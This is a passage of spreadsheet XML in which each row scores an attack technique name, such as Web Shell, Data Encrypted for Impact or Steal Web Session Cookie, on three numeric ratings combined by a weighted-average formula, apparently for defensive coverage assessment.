      <c r="C223" s="45" t="s">
        <v>859</v>
      </c>
      <c r="D223" s="14">
        <v>3</v>
      </c>
      <c r="E223" s="14">
        <v>4</v>
      </c>
      <c r="F223" s="14">
        <v>5</v>
      </c>
      <c r="G223" s="32">
        <f t="shared" si="3"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="224" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A224" s="43" t="s">
        <v>349</v>
      </c>
      <c r="B224" s="41" t="str">
        <f>LOOKUP(A224,'REF-DataSources'!A:B)</f>
        <v>Linux and Mac File and Directory Permissions Modification</v>
      </c>
      <c r="C224" s="45" t="s">
        <v>598</v>
      </c>
      <c r="D224" s="14">
        <v>2</v>
      </c>
      <c r="E224" s="14">
        <v>4</v>
      </c>
      <c r="F224" s="14">
        <v>5</v>
      </c>
      <c r="G224" s="32">
        <f t="shared" si="3"/>
        <v>3.4</v>
      </c>
    </row>
    <row r="225" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A225" s="43" t="s">
        <v>350</v>
      </c>
      <c r="B225" s="41" t="str">
        <f>LOOKUP(A225,'REF-DataSources'!A:B)</f>
        <v>Execution Guardrails</v>
      </c>
      <c r="C225" s="45" t="s">
        <v>589</v>
      </c>
      <c r="D225" s="14">
        <v>2</v>
      </c>
      <c r="E225" s="14">
        <v>4</v>
      </c>
      <c r="F225" s="14">
        <v>5</v>
      </c>
      <c r="G225" s="32">
        <f t="shared" si="3"/>
        <v>3.4</v>
      </c>
    </row>
    <row r="226" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A226" s="43" t="s">
        <v>351</v>
      </c>
      <c r="B226" s="41" t="str">
        <f>LOOKUP(A226,'REF-DataSources'!A:B)</f>
        <v>Domain Trust Discovery</v>
      </c>
      <c r="C226" s="45" t="s">
        <v>1698</v>
      </c>
      <c r="D226" s="14">
        <v>3</v>
      </c>
      <c r="E226" s="14">
        <v>4</v>
      </c>
      <c r="F226" s="14">
        <v>5</v>
      </c>
      <c r="G226" s="32">
        <f t="shared" si="3"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="227" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A227" s="43" t="s">
        <v>353</v>
      </c>
      <c r="B227" s="41" t="str">
        <f>LOOKUP(A227,'REF-DataSources'!A:B)</f>
        <v>Domain Trust Discovery</v>
      </c>
      <c r="C227" s="45" t="s">
        <v>3090</v>
      </c>
      <c r="D227" s="14">
        <v>3</v>
      </c>
      <c r="E227" s="14">
        <v>4</v>
      </c>
      <c r="F227" s="14">
        <v>5</v>
      </c>
      <c r="G227" s="32">
        <f t="shared" si="3"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="228" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A228" s="43" t="s">
        <v>355</v>
      </c>
      <c r="B228" s="41" t="str">
        <f>LOOKUP(A228,'REF-DataSources'!A:B)</f>
        <v>Group Policy Modification</v>
      </c>
      <c r="C228" s="45" t="s">
        <v>584</v>
      </c>
      <c r="D228" s="14">
        <v>4</v>
      </c>
      <c r="E228" s="14">
        <v>4</v>
      </c>
      <c r="F228" s="14">
        <v>5</v>
      </c>
      <c r="G228" s="32">
        <f t="shared" si="3"/>
        <v>4.2</v>
      </c>
    </row>
    <row r="229" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A229" s="43" t="s">
        <v>356</v>
      </c>
      <c r="B229" s="41" t="str">
        <f>LOOKUP(A229,'REF-DataSources'!A:B)</f>
        <v>Data Destruction</v>
      </c>
      <c r="C229" s="45" t="s">
        <v>722</v>
      </c>
      <c r="D229" s="14">
        <v>2</v>
      </c>
      <c r="E229" s="14">
        <v>3</v>
      </c>
      <c r="F229" s="14">
        <v>5</v>
      </c>
      <c r="G229" s="32">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="230" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A230" s="43" t="s">
        <v>357</v>
      </c>
      <c r="B230" s="41" t="str">
        <f>LOOKUP(A230,'REF-DataSources'!A:B)</f>
        <v>Data Encrypted for Impact</v>
      </c>
      <c r="C230" s="45" t="s">
        <v>1710</v>
      </c>
      <c r="D230" s="14">
        <v>2</v>
      </c>
      <c r="E230" s="14">
        <v>3</v>
      </c>
      <c r="F230" s="14">
        <v>5</v>
      </c>
      <c r="G230" s="32">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="231" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A231" s="43" t="s">
        <v>359</v>
      </c>
      <c r="B231" s="41" t="str">
        <f>LOOKUP(A231,'REF-DataSources'!A:B)</f>
        <v>Data Encrypted for Impact</v>
      </c>
      <c r="C231" s="45" t="s">
        <v>3091</v>
      </c>
      <c r="D231" s="14">
        <v>2</v>
      </c>
      <c r="E231" s="14">
        <v>3</v>
      </c>
      <c r="F231" s="14">
        <v>5</v>
      </c>
      <c r="G231" s="32">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="232" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A232" s="43" t="s">
        <v>360</v>
      </c>
      <c r="B232" s="41" t="str">
        <f>LOOKUP(A232,'REF-DataSources'!A:B)</f>
        <v>Data Encrypted for Impact</v>
      </c>
      <c r="C232" s="45" t="s">
        <v>2294</v>
      </c>
      <c r="D232" s="14">
        <v>2</v>
      </c>
      <c r="E232" s="14">
        <v>3</v>
      </c>
      <c r="F232" s="14">
        <v>5</v>
      </c>
      <c r="G232" s="32">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="233" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A233" s="43" t="s">
        <v>361</v>
      </c>
      <c r="B233" s="41" t="str">
        <f>LOOKUP(A233,'REF-DataSources'!A:B)</f>
        <v>Service Stop</v>
      </c>
      <c r="C233" s="45" t="s">
        <v>3092</v>
      </c>
      <c r="D233" s="14">
        <v>4</v>
      </c>
      <c r="E233" s="14">
        <v>5</v>
      </c>
      <c r="F233" s="14">
        <v>5</v>
      </c>
      <c r="G233" s="32">
        <f t="shared" si="3"/>
        <v>4.5999999999999996</v>
      </c>
    </row>
    <row r="234" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A234" s="43" t="s">
        <v>362</v>
      </c>
      <c r="B234" s="41" t="str">
        <f>LOOKUP(A234,'REF-DataSources'!A:B)</f>
        <v>Inhibit System Recovery</v>
      </c>
      <c r="C234" s="45" t="s">
        <v>1718</v>
      </c>
      <c r="D234" s="14">
        <v>4</v>
      </c>
      <c r="E234" s="14">
        <v>5</v>
      </c>
      <c r="F234" s="14">
        <v>5</v>
      </c>
      <c r="G234" s="32">
        <f t="shared" si="3"/>
        <v>4.5999999999999996</v>
      </c>
    </row>
    <row r="235" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A235" s="43" t="s">
        <v>363</v>
      </c>
      <c r="B235" s="41" t="str">
        <f>LOOKUP(A235,'REF-DataSources'!A:B)</f>
        <v>Defacement</v>
      </c>
      <c r="C235" s="45" t="s">
        <v>1722</v>
      </c>
      <c r="D235" s="14">
        <v>3</v>
      </c>
      <c r="E235" s="14">
        <v>4</v>
      </c>
      <c r="F235" s="14">
        <v>5</v>
      </c>
      <c r="G235" s="32">
        <f t="shared" si="3"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="236" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A236" s="43" t="s">
        <v>364</v>
      </c>
      <c r="B236" s="41" t="str">
        <f>LOOKUP(A236,'REF-DataSources'!A:B)</f>
        <v>External Defacement</v>
      </c>
      <c r="C236" s="45" t="s">
        <v>1811</v>
      </c>
      <c r="D236" s="14">
        <v>2</v>
      </c>
      <c r="E236" s="14">
        <v>3</v>
      </c>
      <c r="F236" s="14">
        <v>5</v>
      </c>
      <c r="G236" s="32">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="237" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A237" s="43" t="s">
        <v>365</v>
      </c>
      <c r="B237" s="41" t="str">
        <f>LOOKUP(A237,'REF-DataSources'!A:B)</f>
        <v>External Defacement</v>
      </c>
      <c r="C237" s="45" t="s">
        <v>2412</v>
      </c>
      <c r="D237" s="14">
        <v>0</v>
      </c>
      <c r="E237" s="14">
        <v>1</v>
      </c>
      <c r="F237" s="14">
        <v>3</v>
      </c>
      <c r="G237" s="32">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="238" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A238" s="43" t="s">
        <v>366</v>
      </c>
      <c r="B238" s="41" t="str">
        <f>LOOKUP(A238,'REF-DataSources'!A:B)</f>
        <v>External Defacement</v>
      </c>
      <c r="C238" s="45" t="s">
        <v>743</v>
      </c>
      <c r="D238" s="14">
        <v>1</v>
      </c>
      <c r="E238" s="14">
        <v>3</v>
      </c>
      <c r="F238" s="14">
        <v>4</v>
      </c>
      <c r="G238" s="32">
        <f t="shared" si="3"/>
        <v>2.4</v>
      </c>
    </row>
    <row r="239" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A239" s="43" t="s">
        <v>367</v>
      </c>
      <c r="B239" s="41" t="str">
        <f>LOOKUP(A239,'REF-DataSources'!A:B)</f>
        <v>Firmware Corruption</v>
      </c>
      <c r="C239" s="45" t="s">
        <v>1735</v>
      </c>
      <c r="D239" s="14">
        <v>0</v>
      </c>
      <c r="E239" s="14">
        <v>1</v>
      </c>
      <c r="F239" s="14">
        <v>4</v>
      </c>
      <c r="G239" s="32">
        <f t="shared" si="3"/>
        <v>1.2</v>
      </c>
    </row>
    <row r="240" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A240" s="43" t="s">
        <v>368</v>
      </c>
      <c r="B240" s="41" t="str">
        <f>LOOKUP(A240,'REF-DataSources'!A:B)</f>
        <v>Resource Hijacking</v>
      </c>
      <c r="C240" s="45" t="s">
        <v>1739</v>
      </c>
      <c r="D240" s="14">
        <v>1</v>
      </c>
      <c r="E240" s="14">
        <v>3</v>
      </c>
      <c r="F240" s="14">
        <v>4</v>
      </c>
      <c r="G240" s="32">
        <f t="shared" si="3"/>
        <v>2.4</v>
      </c>
    </row>
    <row r="241" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A241" s="43" t="s">
        <v>370</v>
      </c>
      <c r="B241" s="41" t="str">
        <f>LOOKUP(A241,'REF-DataSources'!A:B)</f>
        <v>Virtualization/Sandbox Evasion</v>
      </c>
      <c r="C241" s="45" t="s">
        <v>609</v>
      </c>
      <c r="D241" s="14">
        <v>0</v>
      </c>
      <c r="E241" s="14">
        <v>2</v>
      </c>
      <c r="F241" s="14">
        <v>4</v>
      </c>
      <c r="G241" s="32">
        <f t="shared" si="3"/>
        <v>1.6</v>
      </c>
    </row>
    <row r="242" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A242" s="43" t="s">
        <v>371</v>
      </c>
      <c r="B242" s="41" t="str">
        <f>LOOKUP(A242,'REF-DataSources'!A:B)</f>
        <v>Network Denial of Service</v>
      </c>
      <c r="C242" s="45" t="s">
        <v>1764</v>
      </c>
      <c r="D242" s="14">
        <v>3</v>
      </c>
      <c r="E242" s="14">
        <v>4</v>
      </c>
      <c r="F242" s="14">
        <v>5</v>
      </c>
      <c r="G242" s="32">
        <f t="shared" si="3"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="243" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A243" s="43" t="s">
        <v>372</v>
      </c>
      <c r="B243" s="41" t="str">
        <f>LOOKUP(A243,'REF-DataSources'!A:B)</f>
        <v>Endpoint Denial of Service</v>
      </c>
      <c r="C243" s="45" t="s">
        <v>1778</v>
      </c>
      <c r="D243" s="14">
        <v>3</v>
      </c>
      <c r="E243" s="14">
        <v>4</v>
      </c>
      <c r="F243" s="14">
        <v>5</v>
      </c>
      <c r="G243" s="32">
        <f t="shared" si="3"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="244" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A244" s="43" t="s">
        <v>374</v>
      </c>
      <c r="B244" s="41" t="str">
        <f>LOOKUP(A244,'REF-DataSources'!A:B)</f>
        <v>Application or System Exploitation</v>
      </c>
      <c r="C244" s="45" t="s">
        <v>1062</v>
      </c>
      <c r="D244" s="14">
        <v>2</v>
      </c>
      <c r="E244" s="14">
        <v>4</v>
      </c>
      <c r="F244" s="14">
        <v>5</v>
      </c>
      <c r="G244" s="32">
        <f t="shared" si="3"/>
        <v>3.4</v>
      </c>
    </row>
    <row r="245" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A245" s="43" t="s">
        <v>375</v>
      </c>
      <c r="B245" s="41" t="str">
        <f>LOOKUP(A245,'REF-DataSources'!A:B)</f>
        <v>Application or System Exploitation</v>
      </c>
      <c r="C245" s="45" t="s">
        <v>1062</v>
      </c>
      <c r="D245" s="14">
        <v>3</v>
      </c>
      <c r="E245" s="14">
        <v>4</v>
      </c>
      <c r="F245" s="14">
        <v>5</v>
      </c>
      <c r="G245" s="32">
        <f t="shared" si="3"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="246" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A246" s="43" t="s">
        <v>376</v>
      </c>
      <c r="B246" s="41" t="str">
        <f>LOOKUP(A246,'REF-DataSources'!A:B)</f>
        <v>Application or System Exploitation</v>
      </c>
      <c r="C246" s="45" t="s">
        <v>3093</v>
      </c>
      <c r="D246" s="14">
        <v>2</v>
      </c>
      <c r="E246" s="14">
        <v>4</v>
      </c>
      <c r="F246" s="14">
        <v>5</v>
      </c>
      <c r="G246" s="32">
        <f t="shared" si="3"/>
        <v>3.4</v>
      </c>
    </row>
    <row r="247" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A247" s="43" t="s">
        <v>377</v>
      </c>
      <c r="B247" s="41" t="str">
        <f>LOOKUP(A247,'REF-DataSources'!A:B)</f>
        <v>Application or System Exploitation</v>
      </c>
      <c r="C247" s="45" t="s">
        <v>3094</v>
      </c>
      <c r="D247" s="14">
        <v>2</v>
      </c>
      <c r="E247" s="14">
        <v>4</v>
      </c>
      <c r="F247" s="14">
        <v>5</v>
      </c>
      <c r="G247" s="32">
        <f t="shared" si="3"/>
        <v>3.4</v>
      </c>
    </row>
    <row r="248" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A248" s="43" t="s">
        <v>378</v>
      </c>
      <c r="B248" s="41" t="str">
        <f>LOOKUP(A248,'REF-DataSources'!A:B)</f>
        <v>Application or System Exploitation</v>
      </c>
      <c r="C248" s="45" t="s">
        <v>3095</v>
      </c>
      <c r="D248" s="14">
        <v>4</v>
      </c>
      <c r="E248" s="14">
        <v>5</v>
      </c>
      <c r="F248" s="14">
        <v>5</v>
      </c>
      <c r="G248" s="32">
        <f t="shared" si="3"/>
        <v>4.5999999999999996</v>
      </c>
    </row>
    <row r="249" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A249" s="43" t="s">
        <v>379</v>
      </c>
      <c r="B249" s="41" t="str">
        <f>LOOKUP(A249,'REF-DataSources'!A:B)</f>
        <v>Server Software Component</v>
      </c>
      <c r="C249" s="45" t="s">
        <v>2407</v>
      </c>
      <c r="D249" s="14">
        <v>2</v>
      </c>
      <c r="E249" s="14">
        <v>3</v>
      </c>
      <c r="F249" s="14">
        <v>4</v>
      </c>
      <c r="G249" s="32">
        <f t="shared" si="3"/>
        <v>2.8</v>
      </c>
    </row>
    <row r="250" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A250" s="43" t="s">
        <v>380</v>
      </c>
      <c r="B250" s="41" t="str">
        <f>LOOKUP(A250,'REF-DataSources'!A:B)</f>
        <v>Web Shell</v>
      </c>
      <c r="C250" s="45" t="s">
        <v>1281</v>
      </c>
      <c r="D250" s="14">
        <v>1</v>
      </c>
      <c r="E250" s="14">
        <v>3</v>
      </c>
      <c r="F250" s="14">
        <v>4</v>
      </c>
      <c r="G250" s="32">
        <f t="shared" si="3"/>
        <v>2.4</v>
      </c>
    </row>
    <row r="251" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A251" s="43" t="s">
        <v>381</v>
      </c>
      <c r="B251" s="41" t="str">
        <f>LOOKUP(A251,'REF-DataSources'!A:B)</f>
        <v>Web Shell</v>
      </c>
      <c r="C251" s="45" t="s">
        <v>935</v>
      </c>
      <c r="D251" s="14">
        <v>3</v>
      </c>
      <c r="E251" s="14">
        <v>4</v>
      </c>
      <c r="F251" s="14">
        <v>5</v>
      </c>
      <c r="G251" s="32">
        <f t="shared" si="3"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="252" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A252" s="43" t="s">
        <v>382</v>
      </c>
      <c r="B252" s="41" t="str">
        <f>LOOKUP(A252,'REF-DataSources'!A:B)</f>
        <v>Software Discovery</v>
      </c>
      <c r="C252" s="45" t="s">
        <v>1062</v>
      </c>
      <c r="D252" s="14">
        <v>3</v>
      </c>
      <c r="E252" s="14">
        <v>4</v>
      </c>
      <c r="F252" s="14">
        <v>5</v>
      </c>
      <c r="G252" s="32">
        <f t="shared" si="3"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="253" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A253" s="43" t="s">
        <v>383</v>
      </c>
      <c r="B253" s="41" t="str">
        <f>LOOKUP(A253,'REF-DataSources'!A:B)</f>
        <v>Security Software Discovery</v>
      </c>
      <c r="C253" s="45" t="s">
        <v>1873</v>
      </c>
      <c r="D253" s="14">
        <v>1</v>
      </c>
      <c r="E253" s="14">
        <v>3</v>
      </c>
      <c r="F253" s="14">
        <v>4</v>
      </c>
      <c r="G253" s="32">
        <f t="shared" si="3"/>
        <v>2.4</v>
      </c>
    </row>
    <row r="254" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A254" s="43" t="s">
        <v>384</v>
      </c>
      <c r="B254" s="41" t="str">
        <f>LOOKUP(A254,'REF-DataSources'!A:B)</f>
        <v>Security Software Discovery</v>
      </c>
      <c r="C254" s="45" t="s">
        <v>3096</v>
      </c>
      <c r="D254" s="14">
        <v>3</v>
      </c>
      <c r="E254" s="14">
        <v>4</v>
      </c>
      <c r="F254" s="14">
        <v>5</v>
      </c>
      <c r="G254" s="32">
        <f t="shared" si="3"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="255" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A255" s="43" t="s">
        <v>385</v>
      </c>
      <c r="B255" s="41" t="str">
        <f>LOOKUP(A255,'REF-DataSources'!A:B)</f>
        <v>Implant Container Image</v>
      </c>
      <c r="C255" s="45"/>
      <c r="D255" s="14">
        <v>0</v>
      </c>
      <c r="E255" s="14">
        <v>0</v>
      </c>
      <c r="F255" s="14">
        <v>0</v>
      </c>
      <c r="G255" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="256" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A256" s="43" t="s">
        <v>386</v>
      </c>
      <c r="B256" s="41" t="str">
        <f>LOOKUP(A256,'REF-DataSources'!A:B)</f>
        <v>Cloud Service Discovery</v>
      </c>
      <c r="C256" s="45" t="s">
        <v>1835</v>
      </c>
      <c r="D256" s="14">
        <v>3</v>
      </c>
      <c r="E256" s="14">
        <v>4</v>
      </c>
      <c r="F256" s="14">
        <v>5</v>
      </c>
      <c r="G256" s="32">
        <f t="shared" si="3"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="257" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A257" s="43" t="s">
        <v>387</v>
      </c>
      <c r="B257" s="41" t="str">
        <f>LOOKUP(A257,'REF-DataSources'!A:B)</f>
        <v>Cloud Service Discovery</v>
      </c>
      <c r="C257" s="45" t="s">
        <v>3097</v>
      </c>
      <c r="D257" s="14">
        <v>3</v>
      </c>
      <c r="E257" s="14">
        <v>4</v>
      </c>
      <c r="F257" s="14">
        <v>5</v>
      </c>
      <c r="G257" s="32">
        <f t="shared" si="3"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="258" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A258" s="43" t="s">
        <v>388</v>
      </c>
      <c r="B258" s="41" t="str">
        <f>LOOKUP(A258,'REF-DataSources'!A:B)</f>
        <v>Steal Application Access Token</v>
      </c>
      <c r="C258" s="45" t="s">
        <v>1840</v>
      </c>
      <c r="D258" s="14">
        <v>2</v>
      </c>
      <c r="E258" s="14">
        <v>3</v>
      </c>
      <c r="F258" s="14">
        <v>4</v>
      </c>
      <c r="G258" s="32">
        <f t="shared" si="3"/>
        <v>2.8</v>
      </c>
    </row>
    <row r="259" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A259" s="43" t="s">
        <v>389</v>
      </c>
      <c r="B259" s="41" t="str">
        <f>LOOKUP(A259,'REF-DataSources'!A:B)</f>
        <v>System Shutdown/Reboot</v>
      </c>
      <c r="C259" s="45" t="s">
        <v>985</v>
      </c>
      <c r="D259" s="14">
        <v>5</v>
      </c>
      <c r="E259" s="14">
        <v>5</v>
      </c>
      <c r="F259" s="14">
        <v>5</v>
      </c>
      <c r="G259" s="32">
        <f t="shared" ref="G259:G267" si="4">((D259*2)+(E259*2)+F259)/5</f>
        <v>5</v>
      </c>
    </row>
    <row r="260" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A260" s="43" t="s">
        <v>390</v>
      </c>
      <c r="B260" s="41" t="str">
        <f>LOOKUP(A260,'REF-DataSources'!A:B)</f>
        <v>Data from Cloud Storage Object</v>
      </c>
      <c r="C260" s="45" t="s">
        <v>1848</v>
      </c>
      <c r="D260" s="14">
        <v>2</v>
      </c>
      <c r="E260" s="14">
        <v>3</v>
      </c>
      <c r="F260" s="14">
        <v>4</v>
      </c>
      <c r="G260" s="32">
        <f t="shared" si="4"/>
        <v>2.8</v>
      </c>
    </row>
    <row r="261" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A261" s="43" t="s">
        <v>391</v>
      </c>
      <c r="B261" s="41" t="str">
        <f>LOOKUP(A261,'REF-DataSources'!A:B)</f>
        <v>Account Access Removal</v>
      </c>
      <c r="C261" s="45" t="s">
        <v>985</v>
      </c>
      <c r="D261" s="14">
        <v>3</v>
      </c>
      <c r="E261" s="14">
        <v>4</v>
      </c>
      <c r="F261" s="14">
        <v>5</v>
      </c>
      <c r="G261" s="32">
        <f t="shared" si="4"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="262" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A262" s="43" t="s">
        <v>392</v>
      </c>
      <c r="B262" s="41" t="str">
        <f>LOOKUP(A262,'REF-DataSources'!A:B)</f>
        <v>Internal Spearphishing</v>
      </c>
      <c r="C262" s="45" t="s">
        <v>1856</v>
      </c>
      <c r="D262" s="14">
        <v>2</v>
      </c>
      <c r="E262" s="14">
        <v>3</v>
      </c>
      <c r="F262" s="14">
        <v>4</v>
      </c>
      <c r="G262" s="32">
        <f t="shared" si="4"/>
        <v>2.8</v>
      </c>
    </row>
    <row r="263" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A263" s="43" t="s">
        <v>393</v>
      </c>
      <c r="B263" s="41" t="str">
        <f>LOOKUP(A263,'REF-DataSources'!A:B)</f>
        <v>Unused/Unsupported Cloud Regions</v>
      </c>
      <c r="C263" s="45" t="s">
        <v>1848</v>
      </c>
      <c r="D263" s="14">
        <v>3</v>
      </c>
      <c r="E263" s="14">
        <v>5</v>
      </c>
      <c r="F263" s="14">
        <v>5</v>
      </c>
      <c r="G263" s="32">
        <f t="shared" si="4"/>
        <v>4.2</v>
      </c>
    </row>
    <row r="264" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A264" s="43" t="s">
        <v>394</v>
      </c>
      <c r="B264" s="41" t="str">
        <f>LOOKUP(A264,'REF-DataSources'!A:B)</f>
        <v>Unused/Unsupported Cloud Regions</v>
      </c>
      <c r="C264" s="45" t="s">
        <v>3098</v>
      </c>
      <c r="D264" s="14">
        <v>4</v>
      </c>
      <c r="E264" s="14">
        <v>5</v>
      </c>
      <c r="F264" s="14">
        <v>5</v>
      </c>
      <c r="G264" s="32">
        <f t="shared" si="4"/>
        <v>4.5999999999999996</v>
      </c>
    </row>
    <row r="265" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A265" s="43" t="s">
        <v>396</v>
      </c>
      <c r="B265" s="41" t="str">
        <f>LOOKUP(A265,'REF-DataSources'!A:B)</f>
        <v>Transfer Data to Cloud Account</v>
      </c>
      <c r="C265" s="45" t="s">
        <v>1848</v>
      </c>
      <c r="D265" s="14">
        <v>3</v>
      </c>
      <c r="E265" s="14">
        <v>4</v>
      </c>
      <c r="F265" s="14">
        <v>5</v>
      </c>
      <c r="G265" s="32">
        <f t="shared" si="4"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="266" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A266" s="43" t="s">
        <v>397</v>
      </c>
      <c r="B266" s="41" t="str">
        <f>LOOKUP(A266,'REF-DataSources'!A:B)</f>
        <v>Cloud Service Dashboard</v>
      </c>
      <c r="C266" s="45" t="s">
        <v>1868</v>
      </c>
      <c r="D266" s="14">
        <v>3</v>
      </c>
      <c r="E266" s="14">
        <v>4</v>
      </c>
      <c r="F266" s="14">
        <v>5</v>
      </c>
      <c r="G266" s="32">
        <f t="shared" si="4"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="267" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A267" s="43" t="s">
        <v>399</v>
      </c>
      <c r="B267" s="41" t="str">
        <f>LOOKUP(A267,'REF-DataSources'!A:B)</f>
        <v>Steal Web Session Cookie</v>
      </c>
      <c r="C267" s="45" t="s">
        <v>1873</v>
      </c>
      <c r="D267" s="14">
        <v>2</v>
      </c>
      <c r="E267" s="14">
        <v>3</v>
      </c>
      <c r="F267" s="14">
        <v>4</v>
      </c>
      <c r="G267" s="32">
        <f t="shared" si="4"/>
        <v>2.8</v>
      </c>
    </row>
    <row r="268" spans="1:7" x14ac:dyDescent="0.2">
      <c r="D268" s="14"/>
      <c r="E268" s="14"/>
      <c r="F268" s="14"/>
      <c r="G268" s="15"/>
    </row>
    <row r="269" spans="1:7" x14ac:dyDescent="0.2">
      <c r="D269" s="14"/>
      <c r="E269" s="14"/>
      <c r="F269" s="14"/>
      <c r="G269" s="15"/>
    </row>
    <row r="270" spans="1:7" x14ac:dyDescent="0.2">
      <c r="D270" s="14"/>
      <c r="E270" s="14"/>
      <c r="F270" s="14"/>
      <c r="G270" s="15"/>
    </row>
    <row r="271" spans="1:7" x14ac:dyDescent="0.2">
      <c r="D271" s="14"/>
      <c r="E271" s="14"/>
      <c r="F271" s="14"/>
      <c r="G271" s="15"/>
    </row>
    <row r="272" spans="1:7" x14ac:dyDescent="0.2">
      <c r="D272" s="14"/>
      <c r="E272" s="14"/>
      <c r="F272" s="14"/>
      <c r="G272" s="15"/>
    </row>
    <row r="273" spans="4:7" x14ac:dyDescent="0.2">
      <c r="D273" s="14"/>
      <c r="E273" s="14"/>
      <c r="F273" s="14"/>
      <c r="G273" s="15"/>
    </row>
    <row r="274" spans="4:7" x14ac:dyDescent="0.2">
      <c r="D274" s="14"/>
      <c r="E274" s="14"/>
      <c r="F274" s="14"/>
      <c r="G274" s="15"/>
    </row>
    <row r="275" spans="4:7" x14ac:dyDescent="0.2">
      <c r="D275" s="14"/>
      <c r="E275" s="14"/>
      <c r="F275" s="14"/>
      <c r="G275" s="15"/>
    </row>
    <row r="276" spans="4:7" x14ac:dyDescent="0.2">
      <c r="D276" s="14"/>
      <c r="E276" s="14"/>
      <c r="F276" s="14"/>
      <c r="G276" s="15"/>
    </row>
    <row r="277" spans="4:7" x14ac:dyDescent="0.2">
      <c r="D277" s="14"/>
      <c r="E277" s="14"/>
      <c r="F277" s="14"/>
      <c r="G277" s="15"/>
    </row>
    <row r="278" spans="4:7" x14ac:dyDescent="0.2">
      <c r="D278" s="14"/>
      <c r="E278" s="14"/>
      <c r="F278" s="14"/>
      <c r="G278" s="15"/>
    </row>
    <row r="279" spans="4:7" x14ac:dyDescent="0.2">
      <c r="D279" s="14"/>
      <c r="E279" s="14"/>
      <c r="F279" s="14"/>
      <c r="G279" s="15"/>
    </row>
    <row r="280" spans="4:7" x14ac:dyDescent="0.2">
      <c r="D280" s="14"/>
      <c r="E280" s="14"/>
      <c r="F280" s="14"/>
      <c r="G280" s="15"/>
    </row>
    <row r="281" spans="4:7" x14ac:dyDescent="0.2">
      <c r="D281" s="14"/>
      <c r="E281" s="14"/>
      <c r="F281" s="14"/>
      <c r="G281" s="15"/>
    </row>
    <row r="282" spans="4:7" x14ac:dyDescent="0.2">
      <c r="D282" s="14"/>
      <c r="E282" s="14"/>
      <c r="F282" s="14"/>
      <c r="G282" s="15"/>
    </row>
    <row r="283" spans="4:7" x14ac:dyDescent="0.2">
      <c r="D283" s="14"/>
      <c r="E283" s="14"/>
      <c r="F283" s="14"/>
      <c r="G283" s="15"/>
    </row>
    <row r="284" spans="4:7" x14ac:dyDescent="0.2">
      <c r="D284" s="14"/>
      <c r="E284" s="14"/>
      <c r="F284" s="14"/>
      <c r="G284" s="15"/>
    </row>
    <row r="285" spans="4:7" x14ac:dyDescent="0.2">
      <c r="D285" s="14"/>
      <c r="E285" s="14"/>
      <c r="F285" s="14"/>
      <c r="G285" s="15"/>
    </row>
    <row r="286" spans="4:7" x14ac:dyDescent="0.2">
      <c r="D286" s="14"/>
      <c r="E286" s="14"/>
      <c r="F286" s="14"/>
      <c r="G286" s="15"/>
    </row>
    <row r="287" spans="4:7" x14ac:dyDescent="0.2">
      <c r="D287" s="14"/>
      <c r="E287" s="14"/>
      <c r="F287" s="14"/>
